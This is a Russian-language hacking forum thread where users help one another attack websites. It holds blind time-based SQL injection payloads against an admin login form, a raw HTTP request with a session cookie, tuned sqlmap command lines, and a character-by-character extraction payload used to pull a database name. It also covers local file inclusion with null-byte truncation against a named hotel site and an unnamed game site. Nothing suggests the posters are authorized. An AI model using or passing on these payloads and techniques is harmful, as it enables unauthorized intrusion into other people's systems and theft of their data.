Ваши вопросы по уязвимостям.

работает, там другая проблема

 

неа, не работает
я проверил подключив admin/index.php%00 - не подключился
admin/index - подключает
---------
в сообщении об ошибке вроде бы видно что да null отработал, но по факту не подключает, хз
в чем там может быть проблема?

 

Точно .

 

У меня даже admin/index - не подключает

 

потому что ../admin/index
php/ лишняя директория

 

джино хостинг кстати, у них какая то интересная настройка не то пых не то апач, пых наверно

 

Подскажите Blind SQL Injection на https://site.com/admin/login/ через post username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27&password=&login=Login Havij через https не работает Sqlmap не находит inj
да и не сильна я в нём( Может есть ещё какие нибудь проги для автоматизации,смогла только названии базы вытащить и всё((

 

sqlmap находит, просто надо быть поприветливей с ним, он не проходимец)

 

Вот я и говорю мож не те параметры задаю((

POST /admin/login/ HTTP/1.1
Cache-Control: no-cache
Referer: https://site.com/admin/login/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
Host: site.com
Accept-Encoding: gzip, deflate
Content-Length: 80
Content-Type: application/x-www-form-urlencoded

username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27&password=&login=Login

sqlmap.py -u https://site.com/admin/login/ --data=username=%27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27&password=&login=Login --cookie=PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634 --random-agent

что тогда здесь не так?

 

мде
для начала

Code:

sqlmap.py -u https://site.com/admin/login/  --data="username=ololo&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --random-agent -v 3 -p username --dbs

 

POST parameter 'username' is not injectable((

 

--prefix="'+" --suffix="+'" --technique=T

 

Всё равно ничего не находит((

 

задавай параметры пустые

 

в смысле логин и пароль ,уже пыталась

'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'

вот таким перебором вытащила имя базы

но вот sqlmap никак нехочет найти ihj

 

Должен sqlmap -u site.com/login/ --form пробуйте

 

--forms тоже нет((

 

sqlmap умеет загружать куки сам?может в этом проблема

 

А если нуль-байт экранируется (%00) то он должен в ошибке выглядеть так (\0.php) а если его нет в ошибке то он обрезает расширение?
Просто есть еще сайт одной популярной игры,там аналогичная ситуация как и с сайтом http://hotel-stalingrad.ru/index.php?page=cafe там так же инклудятся локальные файлы как и c этим сайтом

Code:

hotel-stalingrad.ru/index.php?page=../admin/index

На сайте игры стоит php 5.4.45 apache 2.2.2
Перечитал уже все сайты о php include так и ничего кроме нуль-байта и [4096] слешей не нашел.
Но я так понял что [4096] слешей не работают с php версией 5.4.45

 

Ну не откинешь ты .php с этого и надо было начинать